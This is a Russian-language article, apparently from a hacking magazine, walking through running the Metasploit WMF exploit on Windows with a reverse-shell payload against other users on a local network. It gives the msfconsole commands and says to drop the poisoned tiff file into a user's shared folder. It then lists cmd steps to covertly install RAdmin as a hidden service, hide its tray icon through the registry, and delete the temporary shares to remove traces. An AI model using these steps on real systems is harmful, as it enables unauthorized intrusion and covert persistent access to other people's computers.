Кто не слышал про WMF-баг, с помощью которого можно получить шелл-доступ к
практически любому компьютеру использующему системную библиотеку для обработки
WMF-файлов? Наверное мало кто, особенно после разгромной статьи в
февральском номере
журнала. Однако, многие Win-пользователи, читающие журнал ][, не смогли его
использовать по следующим причинам:
- Отсутствие доступа к никсовому шеллу на удалённом компьютере;
- Слабое знание других систем: FreeBSD, LINUX;
Возникает вопрос: зачем ломать WIN–компьютеры с никсовых шеллов? Почему бы не
протестировать эксплоит в родной среде, спросите вы? Не будем разбирать
экзотические варианты, типа работы под Virtual PC или WMWARE альтернативных
систем, а также Cygwin (хотя без него не обойтись, смотри далее). Сделаем всё
проще, запустим перловый эксплоит в Windows.
Всё протестировано на двух Windows XP
SP2 в локальной сети и работает.
На диске ][ лежал пакет Metasploit Fгаmеwork - но он для никсов! Хотя и в его
составе есть сплоит ie_xp_pfv_metafile.pm. На практике, при запуске в Active
perl for Win32, он не работает, точнее не работает весь пакет Metasploit
Fгаmеwork 2.5. Идём по ссылке
http://www.metasploit.com/projects/Framework/downloads.html и скачиваем -
“Metasploit fгаmеwork 2.5 Win32 Cygwin Installer”, запускаем MSFConsole , делаем
ls exploits и с сожалением обнаруживаем, что ie_xp_pfv_metafile.pm там нет! Вот
облом... Где взять? Ответ прост: на DVD ][ или скачать Metasploit ifгаmеwork 2.5
для никсов – в этом пакете он присутствует! То есть достаточно его
перекопировать в папку exploits и пользоваться на здоровье. Вот так, для
Win-пользователей всё упрощается.
Что делать дальше, когда вы получили шелл-доступ с правами системы к
удалённому компьютеру с Windows, зависит от вашей фантазии. Для примера
расскажу, что можно сделать в локальной сети для пользы (точнее для упрощённого
администрирования WIN-систем администратором).
1. Удалённая скрытая установка RAdmin
Не всегда есть доступ к компьютеру пользователя (компьютер занят
пользователем, далеко и т. д.). Поэтому воспользуемся WMF – багом и поставим на
его компьютер RA удалённо, по локальной сети. Как правило (у нас в локалке,
например) каждый юзверь имеет расшаренную папку, разрешённую для записи и в
основном пользуется стандартным проводником (никуда от него не деться –
стандартная оболочка, используется в любой программе – файл\открыть
файл\сохранить).
Запускаем консоль MSFConsole и дальше:
msf > use ie_xp_pfv_metafile – будем использовать сплоит для WMF
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse – цепляем реверс-шелл для
win32
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST ххх.ххх.ххх.ххх –
устанавливаем IP куда будет коннектится реверс-шелл
LHOST -> xxx.xxx.xxx.xxx
msf ie_xp_pfv_metafile(win32_reverse) > exploit – запускаем эксплоит
[*] Starting Reverse Handler.
[*] Waiting for connections to http://ххх.ххх.ххх.ххх:8080/ - поднимается
Web-сервер на ранее указанном адресе и ждёт подключений.
Через IE на нашей системе зайдём на этот Web-сервер и опа… взломаем сами себя
(ну это не страшно). В консоли сделаем exit и не будем над собой издеваться.
Теперь зайдём в IE в Сервис\Свойства\Общие\Параметры…\Просмотр файлов…. И
найдём ядовитый tiff-файл, содержащий шелл-код, имя файла будет что-то типа
«M16R14KtkTuEys0Iqt9M4vqK3ny4Kh1vem[2].tiff». Остаётся скопировать этот файл в
папку юзверя (предварительно подняв web-сервер ещё раз на своём компьютере) и
ждать когда он откроет папку, содержащую наш ядовитый файл с шелл-кодом.
Дождались соединения, юзверь в этот момент ничего не заметит (если не
посмотрит в процессы и не увидит там cmd.exe).
Дальше зальём ему RA (предварительно упаковав в SFX-архив RA.exe сам
r_server.exe и две необходимые библиотеки AdmDll.dll, raddrv.dll, а так же
reg-файл для скрытия иконки r_server`a в трее Hide_RA.reg – он меняет один ключ,
вот его содержание:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"DisableTrayIcon"=hex:01,00,00,00
Примечание:
Для упаковки в SFX-архив (самораспаковывающийся архив) использовал WinRAR v.
3.2 со следующими параметрами:
Path=.\%SystemRoot%\system32\
SavePath
Silent=1
Overwrite=2
Можете задать другие, но на мой взгляд это оптимальные. Далее в консоли (уже
в консоли cmd) пишем:
cd \ `перейти в корень
диска
cd %SystemRoot%\system32 `задаём текущую папку
system32
net share C$$=C: `расшариваем диск C: юзверя – он
невидим в сетевом окружении
net share D$$=D: `расшариваем диск D: тоже (не
знаем где система стоит, может и на D:)
copy /y \\имя компьютера_\Папка_RA\ra.exe %SystemRoot%\system32 `копируем
архив RA в системную папку юзверя
cmd /c ra.exe `распаковываем всё необходимое для
установки r_server и запуска его в скрытом режиме
r_server /install /silence `инсталлируем
r_server.exe в скрытом режиме как службу
reg import Hide_RA.reg `скрываем иконку
r_server.exe в трее
r_server /start /silence `запускаем скрытно службу
r_server.exe
`Всё, r_server.exe ждёт подключений клиента…
delete ra.exe `удаляем архив
net share C$$ /delete `удаляем шары
net share D$$ /delete
exit `выходим из консоли cmd
Можно включить в архив run.cmd файл вида:
r_server /silence /install
reg import Hide_RA.reg
r_server /silence /start
delete ra.exe
net share C$$ /delete
net share D$$ /delete
exit
Тогда после «cmd /c ra.exe» в консоли надо запустить на исполнение его,
например так:
cmd /c run.cmd `инсталлируем
и запускаем службу r_server, затем убираем следы
exit `выходим из консоли cmd (шелла удалённого
компьютера) в консоль MFS
msf ie_xp_pfv_metafile(win32_reverse) > exploit `и
так далее остальных юзверей…
2. Удалённое превращение Windows_XP_SP2 в сервер win-терминалов.
Компьютер с сервером терминалов позволяет подключится к нему по типу
удалённого рабочего стола, только без выхода из системы основного пользователя,
а в отдельном сеансе, т. е. позволит работать за компьютеров как минимум двум
пользователям одновременно, одному из них удалённо.
Работы ведутся. Продолжение следует?
